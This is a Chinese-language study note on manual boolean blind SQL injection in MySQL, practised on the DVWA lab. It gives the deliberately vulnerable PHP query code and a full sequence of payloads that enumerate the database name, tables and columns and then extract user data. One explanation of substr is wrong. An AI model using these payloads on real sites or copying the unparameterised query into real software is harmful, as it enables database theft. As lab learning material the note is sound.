学习笔记十四:MySQL手注之布尔型盲注
1.原理
1 <?php 2 3 if( isset( $_GET[ 'Submit' ] ) ) { 4 // Get input 5 $id = $_GET[ 'id' ]; 6 // Check database 7 $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 8 $result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to 9 suppress mysql errors 10 // Get results 11 $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors 12 if( $num > 0 ) { 13 // Feedback for end user 14 $html .= '<pre>User ID exists in the database.</pre>'; 15 } 16 else { 17 // User wasn't found, so the page wasn't!readme 18 header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); 19 // Feedback for end user 20 $html .= '<pre>User ID is MISSING from the database.</pre>'; 21 } 22 ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : 23 $___mysqli_res); 24 } 25 26 ?>
2.盲注常用的函数
- length() 返回字符串的长度,例如用来返回数据库名字的长度
- substr(string,start,length) 用来截取字符串,例如有字符串a=“abcdefg” 那么substr(a,1,3)就表示截取“bcd”,substr(a,3,1)就表示截取“d” ,若是遇到substr(string,0)表示截取整个字符串
- ascii() 返回字符的ASCII码
- sleep(n) 将程序挂起一段时间,n是指n秒
- if(expr1,expr2,expr3) 判断语句,如果第一个语句正确就执行第二个语句如果错误就执行第三个语句
3.注入流程
1)判断是否存在注入,注入是字符型还是数字型
1' and 1=1 #
1' and 1=2 #
2)猜解当前数据库名
猜长度
输入1' and length(database())=1 #,显⽰不存在;
输⼊1' and length(database())=2 #,显⽰不存在;
输⼊1' and length(database())=3 #,显⽰不存在;
输⼊1' and length(database())=4 #,显⽰存在; 说明数据库名的长度为4
二分法逐字猜解
输⼊1' and ascii(substr(database(),1,1))>97 #,显⽰存在,说明数据库名的第⼀个字符的ascii值⼤于 97(⼩写字母a的ascii值);
输⼊1' and ascii(substr(database(),1,1))<122 #,显⽰存在,说明数据库名的第⼀个字符的ascii值⼩于 122(⼩写字母z的ascii值);
输⼊1' and ascii(substr(database(),1,1))<109 #,显⽰存在,说明数据库名的第⼀个字符的ascii值⼩于 109(⼩写字母m的ascii值);
输⼊1' and ascii(substr(database(),1,1))<103 #,显⽰存在,说明数据库名的第⼀个字符的ascii值⼩于 103(⼩写字母g的ascii值);
输⼊1' and ascii(substr(database(),1,1))<100 #,显⽰不存在,说明数据库名的第⼀个字符的ascii值不 ⼩于100(⼩写字母d的ascii值);
输⼊1' and ascii(substr(database(),1,1))>100 #,显⽰不存在,说明数据库名的第⼀个字符的ascii值不 ⼤于100(⼩写字母d的ascii值),所以数据库名的第⼀个字符的ascii值为100,即⼩写字母d。
……
重复以上步骤知道得出完整的数据库名dvwa
输⼊1' and ascii(substr(database(),n,1))>100
……
3)猜解表名
猜解表的数量
1' and (select count(table_name) from information_schema.tables where table_schema=database())=1 # 显⽰不存在
1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 # 显⽰存在;说明该数据库有2个表
猜解第一个表名长度
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 # 显⽰不存在
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2 # 显⽰不存在
……
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # 显⽰存在;说明该表的长度为9
要猜解第二张表名长度时将limit 0,1 改为limit 1,1
猜解第一个表的名字
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 # 显⽰存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122 # 显⽰存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<109 # 显⽰存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103 # 显⽰不存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103 # 显⽰不存在
……
重复以上操作,猜解出表名为guestbook,users
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),n,1))>97 #
4)猜解表中的字段名
猜解字段的数量
1' and (select count(column_name) from information_schema.columns where table_name= 'users')=1 # 显⽰不存在
……
1' and (select count(column_name) from information_schema.columns where table_name= 'users')=8 # 显⽰存在;说明表中有8个字段
猜解第一个字段的长度
1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=1 # 显⽰不存在
……
1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=7 # 显⽰存在;说明第一个字段长度为7
猜解第一个字段名
1' and ascii(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1,1))>97 # 显⽰存在
……
重复操作
5)猜解数据
二分法猜解数据
and ascii(substr((select user from dvwa.users limit 0,1),1,1))>96 #
……
暴力猜解
1' and (select count(*) from users where user = 'admin') = 1 #
4.优缺点
操作起来很繁琐,当无法使用联合查询时采用布尔盲注,但只要去做就基本一定能获得结果
浙公网安备 33010602011771号